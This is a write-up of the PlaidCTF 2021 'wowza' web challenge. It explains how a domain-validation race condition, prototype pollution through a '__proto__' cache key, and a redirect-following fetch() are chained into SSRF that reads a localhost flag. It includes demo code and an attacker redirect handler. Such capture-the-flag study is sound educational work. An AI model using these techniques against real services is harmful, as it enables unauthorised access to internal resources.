PlaidCTF 2021 - wowza - web (350pt)

Once the pinnacle of the 20th century tech industry, now a defunct relic of the past. Meet the people behind the rise and fall of a search engine giant in the new documentary, Wowza!

wowza.tgz
<link to wowza service>

This was a fun web challenge in PlaidCTF that used a neat combination of vulnerabilities.

We get source code to the entire application. The Wowza server gives us a private instance of the application which we have access to for 15 minutes to conduct our attack and get the flag.

  • The application consists of 2 services with the following functionality:
    • search-console
      • Add a domain
      • verify ownership of the domain by adding a randomly generated TXT record to it
      • once the domain is verified, you can index it
      • indexing runs a scrape on the site: it follows every link on the website and ranks the indexed pages with PageRank. Yes, they literally implemented PageRank for this challenge
    • site-search
      • search bar with 2 inputs, domain and keyword
      • searches an indexed domain from search-console
      • sends a POST request with search data to the API running on search-console

Looking through the source code, it seems that our goal is to get SSRF on site-search:

    // Let's just call a spade a spade, shall we?
    const ssrfTarget = express();
    ssrfTarget.get("/flag.txt", (req, res) => {
        if (req.hostname !== "localhost") {
            return res.status(401).send(">:(");
        }

        res.send(FLAG);
    });
    ssrfTarget.listen(1337, "127.0.0.1");

So of course, we look for places in the site-search source code that make outbound requests on our behalf. This is the only relevant location:

export const getResults = async (domain: string, query: string) => {
    if (cache[domain]?.[query]) {
        return cache[domain][query];
    }

    const tokens = query
        .split(/\s+/g)
        .map((x) => x.replace(/[^a-zA-Z0-9]+/g, ""))
        .filter((x) => x !== "");

    const results = await fetch(new URL("/search", consoleUrl), {
        headers: {
            "Content-Type": "application/json",
        },
        method: "POST",
        body: JSON.stringify({ domain, query: tokens }),
    });

    const searchResults: Result[] = await results.json();
    const patched = await Promise.all(
        searchResults
            .map(async (result) => {
                if (result.isStale) {
                    const pageUrl = new URL(result.path, "http://" + domain);
                    try {
                        const refetch = await fetch(pageUrl);
                        const body = await refetch.text();
                        result.description = getBody(body).join(" ").trim();
                    } catch (e) {
                        // pass
                    }
                }

                return result;
            })
    );

    const domainCache = cache[domain] ?? {};
    domainCache[query] = patched;
    cache[domain] = domainCache;

    return patched;
}

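The key here is the fetch(pageUrl) call inside the if (result.isStale) branch: the site-search service will attempt to re-fetch a page if its search result has the isStale property set, and it stores the fetched body in the result's description. This fetch() call will follow redirects. So if we can get to this block of code, and we change our page to 302-redirect to http://localhost:1337/flag.txt, it will trigger an SSRF and grab the flag instead :) Note that the redirect has to use the hostname localhost rather than 127.0.0.1, because the flag handler checks req.hostname.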

Now the problem comes down to figuring out how to set the isStale flag on a search result -- because searching through the codebase, isStale is nowhere else to be seen! Nothing ever writes to the isStale property, and in fact, a close examination of the /search endpoint reveals that it will only ever return the properties name, path, description on a search result. So, how can we set it?

Something that stuck out to me as being fishy in the above block of code was the cache object and the block of code to update it at the bottom. This can be exploited with Prototype Pollution. If we set our domain to __proto__ and our query to isStale, then cache[domain] evaluates to Object.prototype instead of a fresh per-domain object, and the write domainCache[query] = patched lands on Object.prototype.isStale. Every plain object, including each search result parsed from the API response, then inherits a truthy isStale! Yes, JS is bizarre.
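To make the mechanism concrete, here is a minimal sketch that replays the three cache-update lines from getResults in isolation. The helper names updateCache and demoPollution are made up for this illustration, and the empty array stands in for whatever the patched results would be (an empty array is still truthy in JS). The sketch removes the polluted property at the end so it does not leak into the rest of the process.

```typescript
type Result = { name: string; path: string; description: string; isStale?: unknown };
type Cache = Record<string, Record<string, unknown> | undefined>;

// Same three statements as the cache update at the bottom of getResults.
function updateCache(cache: Cache, domain: string, query: string, patched: unknown): void {
    const domainCache = cache[domain] ?? {}; // cache["__proto__"] is Object.prototype
    domainCache[query] = patched;            // writes Object.prototype.isStale
    cache[domain] = domainCache;             // re-assigns the prototype to itself
}

// Hypothetical demo helper: reports whether a freshly parsed result looks stale.
function demoPollution(): { before: boolean; after: boolean } {
    const cache: Cache = {};
    const parse = (): Result =>
        JSON.parse('{"name":"n","path":"/payload.html","description":""}');

    const before = Boolean(parse().isStale); // nothing polluted yet
    updateCache(cache, "__proto__", "isStale", []);
    const after = Boolean(parse().isStale);  // inherited from Object.prototype

    // Clean up so the pollution does not outlive the demo.
    delete (Object.prototype as any).isStale;
    return { before, after };
}

console.log(demoPollution());
```

The parsed object never has its own isStale key; the property lookup simply falls through to the polluted prototype, which is why the /search endpoint only returning name, path and description does not help.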

I thought we were done with the problem here, but there was another issue: the /search endpoint would return an error object when you passed a domain of __proto__, so we couldn't reach the block of code where the domainCache gets updated. This was because the search service would actually check whether the domain was a validated domain. So, we somehow had to get the domain __proto__ validated.

After close inspection of the code, I finally noticed that the validateSite function in search-console was doing something interesting:

export const validateSite = async (username: string, domain: string, validation_code: string) => {
    await transaction(async () => {
        const pendingSitePromise = query<PendingSite>`
                SELECT * FROM pending_site
                WHERE domain = ${domain}
                    AND username = ${username}
                    AND validation_code = ${validation_code};`
            .then((validationResults) => {
                if (validationResults.length !== 1) {
                    throw new SafeError(401, "Invalid validation code");
                };
            })
            .then(() => query`
                DELETE FROM pending_site
                WHERE domain = ${domain};
            `);

        const siteInsertPromise = query`
            INSERT INTO site (domain, pages, indices)
            VALUES (${domain}, ${JSON.stringify([])}, ${JSON.stringify([])});
        `;

        const ownershipInsertPromise = query`
            INSERT INTO user_site_ownership (username, domain)
            VALUES (${username}, ${domain});
        `;

        const results = await Promise.allSettled([pendingSitePromise, siteInsertPromise, ownershipInsertPromise]);
        assertAllSettled(results);
    })
}

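Notice that all three queries are created up front and only then handed to Promise.allSettled(). The two INSERT queries are not chained behind the validation check, so they start running at the same time as the SELECT instead of waiting for it to succeed. Surely, it can't be executing them simultaneously, right? It turned out that it was. If you sent enough requests to validate a domain, you would encounter a race condition where it would insert the domain into the site table without it actually needing to be validated.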
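The ordering problem can be reproduced without a database. The sketch below is a simplification under stated assumptions: pendingSite and site are hypothetical in-memory stand-ins for the tables, tick() fakes query latency, and there is no transaction or rollback at all, so the insert always sticks. In the real service the window is presumably much narrower, which would explain why it took a lot of requests to hit.

```typescript
// Hypothetical in-memory stand-ins for the pending_site and site tables.
const pendingSite = new Map<string, string>(); // domain -> validation code
const site = new Set<string>();

// Fakes a query that takes one timer tick to complete.
const tick = () => new Promise<void>((resolve) => setTimeout(resolve, 0));

async function checkCode(domain: string, code: string): Promise<void> {
    await tick();
    if (pendingSite.get(domain) !== code) {
        throw new Error("Invalid validation code");
    }
}

async function insertSite(domain: string): Promise<void> {
    await tick();
    site.add(domain);
}

// Mirrors the shape of validateSite: both promises are created, and therefore
// started, before anything is awaited. The insert never waits for the check.
async function validateSiteSketch(domain: string, code: string): Promise<string[]> {
    const check = checkCode(domain, code);
    const insert = insertSite(domain);
    const results = await Promise.allSettled([check, insert]);
    return results.map((r) => r.status);
}

async function demoRace(): Promise<{ statuses: string[]; inserted: boolean }> {
    pendingSite.set("__proto__", "real-code");
    const statuses = await validateSiteSketch("__proto__", "wrong-code");
    return { statuses, inserted: site.has("__proto__") };
}

demoRace().then((r) => console.log(r));
```

Chaining the inserts behind the check (for example, awaiting the SELECT before building the INSERT queries) would remove the overlap in this sketch.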

So our final exploit was as follows:

  1. add a domain that we control, e.g. evil.com
  2. add the domain __proto__
  3. validate both using the race condition (just spam requests to /validate/)
  4. add an index.html file to our domain which contains a link to /payload.html
  5. trigger a scrape for evil.com
  6. in site-search search for __proto__, isStale to trigger the prototype pollution
  7. in our webserver, make /payload.html 302 redirect to http://localhost:1337/flag.txt
  8. in site-search search for evil.com, keyword, where keyword is some keyword that was inside the original payload.html file.
  9. get flag =)
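The attacker-side web server from steps 4 and 7 only needs two behaviours, so it can be sketched as a pure function that any HTTP server could call. Everything here is illustrative rather than the script we actually ran: the SimpleResponse shape, the Phase switch, the respond function and the keyword "uniquekeyword" are all assumptions made for this example.

```typescript
// Hypothetical response shape; not tied to any particular HTTP framework.
interface SimpleResponse {
    status: number;
    headers: Record<string, string>;
    body: string;
}

// Flag location, taken from the ssrfTarget route shown earlier.
const FLAG_URL = "http://localhost:1337/flag.txt";

// "scrape": serve real content so the crawler indexes /payload.html.
// "attack": redirect /payload.html so the stale re-fetch lands on the flag.
type Phase = "scrape" | "attack";

function respond(path: string, phase: Phase): SimpleResponse {
    const html = { "Content-Type": "text/html" };
    if (path === "/" || path === "/index.html") {
        // Step 4: the index page links to the payload page.
        return { status: 200, headers: html, body: '<a href="/payload.html">payload</a>' };
    }
    if (path === "/payload.html") {
        if (phase === "attack") {
            // Step 7: after indexing, bounce the re-fetch to the flag endpoint.
            return { status: 302, headers: { Location: FLAG_URL }, body: "" };
        }
        // During the scrape, serve a keyword we can search for in step 8.
        return { status: 200, headers: html, body: "<p>uniquekeyword</p>" };
    }
    return { status: 404, headers: html, body: "not found" };
}

console.log(respond("/payload.html", "attack"));
```

The phase is flipped from "scrape" to "attack" by hand once the scrape in step 5 has finished.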

TL;DR

  • bug 1: can validate domains with a race condition
  • bug 2: can use prototype pollution to write isStale into any returned search result
  • bug 3: fetch() follows redirects, abuse for SSRF